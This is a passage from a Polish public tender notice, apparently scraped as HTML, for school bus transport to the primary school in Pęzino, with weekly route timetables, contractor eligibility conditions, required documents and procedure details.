na zajęcia w przypadku podpisania umowy o dofinansowanie projektu konkursowego w ramach działania 8.3.Zakładana liczba km nie obejmuje dojazdu do miejsca, w którym uczniowie wsiadają i zjazdu z miejsca, w którym uczniowie wysiadają. Przebieg trasy każdorazowo ustala Zamawiający.Część V. Przewóz uczniów do i z Szkoły Podstawowej w Pęzinie.o	Przewóz obejmuje następujące miejscowości: Barzkowice, Golina, Brudzewice (25 uczniów), Ulikowo (36 uczniów), Krąpiel Trzebiatów (102 uczniów). Łącznie 163 uczniów. Odwóz uczniów z kierunku Brudzewice, Golina Barzkowice wspierany będzie przez Przewoźnika wykonującego przewozy uczniów w części II.Planowany harmonogram przywozu i odwozów uczniów przedstawia się następująco: Przywozy poniedziałek:I Autobus I Przywóz (60 osób do przewiezienia) - kierunek Barzkowice, Golina, Brudzewice, Ulikowo - 17,5 kmBarzkowice - 7:10Golina - 7:15Brudzewice - 7:20Ulikowo - 7:30SP Pęzino - 7:35II Autobus II Przywóz (54 osoby do przewiezienia w jednym kursie )- kierunek Krąpiel, Trzebiatów - 13,2 kmKurs 1 - 6,4 kmKrąpiel - 7:10SP Pęzino - 7:20Kurs 2 - 6,8 kmSP Pęzino - 7:25Trzebiatów - 7:30SP Pęzino - 7:35 III Przywóz - kierunek Krąpiel - Trzebiatów - 12,8 kmSP Pęzino - 10:00Krąpiel - 10:10Trzebiatów - 10:15SP Pęzino - 10:20Przywozy wtorek I Autobus I Przywóz (50 osób do przewiezienia) - kierunek Barzkowice, Golina, Brudzewice, Ulikowo - 19,7 kmUlikowo - 7:10Barzkowice - 7:20Golina - 7:25Brudzewice - 7:30SP Pęzino - 7:35II Autobus II Przywóz (łącznie 94 osoby do przewiezienia) - kierunek Krąpiel, Trzebiatów Kurs 1- 6,4 kmKrąpiel - 7:05Trzebiatów - 7:10SP Pęzino - 7:20Kurs 2 - 12,8 kmSP Pęzino - 7:20Krąpiel- 7:25Trzebiatów - 7:30SP Pęzino - 7:40 III Przywóz - Kierunek Krąpiel - Trzebiatów + Brudzewice, Barzkowice, Ulikowo - 36 kmSP Pęzino - 9:35Brudzewice - 9:45Golina - 9:50Barzkowice - 9:55Krąpiel - 10:05Trzebiatów - 10:10Ulikowo - 10:20SP Pęzino - 10:25 Przywozy środa: I Autobus I Przywóz (60 osób do przewiezienia) - kierunek Barzkowice, Golina, Brudzewice, Ulikowo - 17,5 kmBarzkowice - 7:10Golina - 7:15Brudzewice - 7:20Ulikowo - 7:30SP Pęzino - 7:35II Autobus II Przywóz (54 osoby do przewiezienia w jednym kursie) - kierunek Krąpiel, Trzebiatów - 13,2 kmKurs 1 - 6,4 kmKrąpiel - 7:10SP Pęzino - 7:20Kurs 2 - 6,8 kmSP Pęzino - 7:25Trzebiatów - 7:30SP Pęzino - 7:35III Przywóz - kierunek Krąpiel - Trzebiatów - 12,8 kmSP Pęzino - 10:00Krąpiel - 10:10Trzebiatów - 10:15SP Pęzino - 10:20 Przywozy czwartek:I Autobus I Przywóz (60 osób do przewiezienia)- kierunek Ulikowo, Barzkowice, Golina, Brudzewice - 19,7 kmUlikowo - 7:10Barzkowice - 7:20Golina - 7:25Brudzewice - 7:30SP Pęzino - 7:40II Autobus II Przywóz (50 osób do przewiezienia w jednym kursie) kierunek Krąpiel, TrzebiatówKurs 1 - 6,4 kmKrąpiel - 7:10SP Pęzino - 7:20Kurs 2 - 6,8 kmSP Pęzino - 7:25Trzebiatów - 7:30SP Pęzino - 7:35III Przywóz - kierunek Krąpiel, Trzebiatów - 12,8 kmSP Pęzino - 10:00Krąpiel - 10:10Trzebiatów10:15SP Pęzino - 10:20	Przywozy piątekI Autobus I Przywóz (60 osób do przewiezienia) - kierunek Barzkowice, Golina, Brudzewice, Ulikowo - 17,5 kmBarzkowice - 7:10Golina - 7:15Brudzewice - 7:20Ulikowo- 7:30SP Pęzino - 7:35 II Autobus II Przywóz (54 osoby do przewiezienia w jednym kursie) - kierunek Krąpiel, Trzebiatów Kurs 1- 6,4 kmKrąpiel - 7:05Trzebiatów - 7:10SP Pęzino - 7:20Kurs 2- 12,8 kmSP Pęzino - 7:20Krąpiel - 7:30Trzebiatów - 7:35SP Pęzino - 7:40III Przywóz - kierunek Barzkowice, Golina, Brudzewice, Ulikowo, Krąpiel, Trzebiatów, Ulikowo - 36 kmBarzkowice - 9:45Golina - 9:50Brudzewice - 9:55Ulikowo - 10:05Krąpiel - 10:15Trzebiatów - 10:20SP Pęzino - 10:25 ODWOZY Poniedziałek	I Autobus I ODWÓZ - 12,8 kmSP Pęzino - 12:45Trzebiatów - 12:50Krąpiel- 12:55SP Pęzino - 13:05	I Autobus II ODWÓZ - 24,6 kmSP Pęzino - 13:15Ulikowo - 13:20Brudzewice - 13:30Golina - 13:35Barzkowice - 13:40SP Pęzino - 13:50	II Autobus III ODWÓZ - 19,7 kmSP Pęzino - 14:00Brudzewice - 14:10Golina - 14:15Barzkowice - 14:20Ulikowo 14:30I Autobus IV ODWÓZ - 12,8 kmSP Pęzino - 14:00Trzebiatów - 14:05Krąpiel - 14:10SP Pęzino - 14:15I Autobus V ODWÓZ - 14,8 kmSP Pęzino - 14:55Ulikowo - 15:00Trzebiatów - 15:05Krąpiel - 15:10	WtorekI Autobus I ODWÓZ - 12,8 kmSP Pęzino - 12:45Trzebiatów - 12:50Krąpiel - 12:55SP Pęzino - 13:05I Autobus II ODWÓZ - 12,8 kmSP Pęzino - 13:15Trzebiatów - 13:20Krąpiel - 13:25SP Pęzino - 13:35II Autobus III ODWÓZ - 17,5 kmSP Pęzino - 13:15Ulikowo - 13:20Brudzewice - 13:30Golina - 13:35Barzkowice - 13:40I Autobus IV ODWÓZ - 12,8 kmSP Pęzino - 14:10Trzebiatów - 14:15Krąpiel - 14:20SP Pęzino - 14:30I Autobus V ODWÓZ - 14,8 kmSP Pęzino - 15:05Ulikowo - 15:10Trzebiatów - 15:20Krąpiel - 15:25	ŚrodaI Autobus I ODWÓZ - 24,6 kmSP Pęzino - 12:45Ulikowo - 12:50Brudzewice - 13:00Golina - 13:05Barzkowice - 13:10SP Pęzino - 13:20II Autobus II ODWÓZ - 12,8 kmSP Pęzino - 13:15Trzebiatów - 13:20Krąpiel - 13:25SP Pęzino - 13:35I Autobus III Odwóz - 17,5 kmSP Pęzino 14:10Ulikowo - 14:15Brudzewice - 14:25Golina - 14:30Barzkowice - 14:35II Autobus IV ODWÓZ - 12,8 kmSP Pęzino - 14:10Trzebiatów- 14:15Krąpiel- 14:20SP Pęzino - 14:30II Autobus V ODWÓZ - 14,8 kmSP Pęzino - 15:05Ulikowo - 15:10Trzebiatów - 15:15Krąpiel - 15:20 CzwartekI Autobus I ODWÓZ - 24,6 kmSP Pęzino - 12:45Ulikowo - 12:35Brudzewice - 13:00Golina - 13:05Barzkowice - 13:10SP Pęzino - 13:20II Autobus II ODWÓZ 12,8 kmSP Pęzino - 13:15Trzebiatów - 13:20Krąpiel - 13:25SP Pęzino - 13:35I Autobus III ODWÓZ - 17,5 kmSP Pęzino - 14:10Ulikowo - 14:15Brudzewice -14:25Golina - 14:30Barzkowice - 14:40II Autobus IV ODWÓZ - 12,8 kmSP Pęzino - 14:10Trzebiatów - 14:15Krąpiel - 14:20SP Pęzino - 14:30II Autobus V ODWÓZ - 14,8 kmSP Pęzino - 15:05Ulikowo - 15:10Trzebiatów - 15:20Krąpiel - 15:25	PiątekI Autobus I ODWÓZ - 12,8 kmSP Pęzino - 11:25Trzebiatów - 11:30Krąpiel - 11:35SP Pęzino - 11:45II Autobus II ODWÓZ - 24,6 kmSP Pęzino - 12:45Ulikowo - 12:50Brudzewice - 13:00Golina - 13:05Barzkowice - 13:10SP Pęzino - 13:20I Autobus III ODWÓZ - 12,8 kmSP Pęzino - 12:45Trzebiatów - 12:50Krąpiel - 12:55SP Pęzino - 13:05I Autobus IV ODWÓZ - 6,4 kmSP Pęzino - 13:15Trzebiatów - 13:20Krąpiel - 13:25II Autobus V ODWÓZ - 17,5kmSP Pęzino - 14:10Ulikowo - 14:15Brudzewice - 14:25Golina - 14:30Barzkowice - 14:35Plan przewozów ustalony na podstawie planu lekcji może podlegać modyfikacjom w trakcie realizacji zamówienia. Modyfikacje planu przewozów mogą dotyczyć godzin, ilości uczniów i krotności przywozów i odwozów. Mapę poglądową dla tej części zamówienia zawiera załącznik nr 8 do SIWZ.Liczba km nie obejmuje dojazdu do miejsca początkowego trasy oraz zjazdu z końcowego miejsca trasy. Przewiduje się około 191 dni nauki szkolnej. W ciągu roku szkolnego w dniach wolnych od zajęć dydaktycznych, a także związanych z obchodami świąt religijnych, państwowych i szkolnych Zamawiający przewiduje zmiany w planie zajęć i co za tym idzie zmniejszenie liczby km w tych dniach. Zamawiający przewiduje możliwość zwiększenia liczby km w przypadku zmiany planu lekcji do 10 km dziennie. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">60130000-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2017-09-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada licencję na transport drogowy osób.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 200.000 zł.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje odpowiednią ilością środków transportu , które są sprawne technicznie oraz posiadają aktualne badania techniczne.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Tak</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Oświadczenie o braku podstaw do wykluczenia. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawione są nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert , a w przypadku osób fizycznych - potwierdza to oświadczenie o braku podstaw do wykluczenia wymienione w pkt. 1.	Listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów albo informację o tym, że wykonawca nie należy do grupy kapitałowej- załącznik nr 7 .Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji zamówienia przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">o O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału w postępowaniu, w szczególności dotyczące:o	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania- Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada licencję na transport drogowy osób.o	Posiadania wiedzy i doświadczenia - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje co najmniej 1 usługę polegającą na dowożeniu uczniów do szkoły, usługa powinna być wykonywana przynajmniej przez okres jednego roku szkolnego.o	Dysponowania odpowiednim potencjałem technicznym - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje odpowiednią ilością środków transportu , które są sprawne technicznie oraz posiadają aktualne badania techniczne.o	Dysponowania osobami zdolnymi do wykonania zamówienia - Zamawiający nie stawia szczegółowych wymagań w tym zakresie.o	Sytuacji ekonomicznej i finansowej - Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 200.000 zł.o	Wykonawca może polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w tej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.o	Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą podlegać wykluczeniu z udziału w postępowaniu.o	Z udziału w niniejszym postępowaniu wyklucza się Wykonawców, którzy podlegają wykluczeniu na podstawie art.24 ust.1 i 2 Prawa zamówień publicznych.o	Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia, metodą spełnia / nie spełnia.o	Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.o	Zamawiający odrzuci ofertę, jeżeli:o Jest niezgodna z ustawą,o	Jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3,o	Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,o	Zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,o	Została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu,o	Zawiera błędy w obliczeniu ceny,o	Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3,o	Jest nieważna na podstawie odrębnych przepisów.o	O wykluczeniu z postępowania oraz o odrzuceniu oferty Wykonawcy zostaną zawiadomieni niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty. Zawiadomienie zawierać będzie uzasadnienie faktyczne i prawne.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Koncesja, zezwolenia, licencja. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłym również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane,wraz z załączeniem dowodów, czy zostały wykonane należycie. Wykaz środków transportu, które są sprawne technicznie oraz posiadają aktualne badania.Opłacona polisa od odpowiedzialności cywilnej, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: 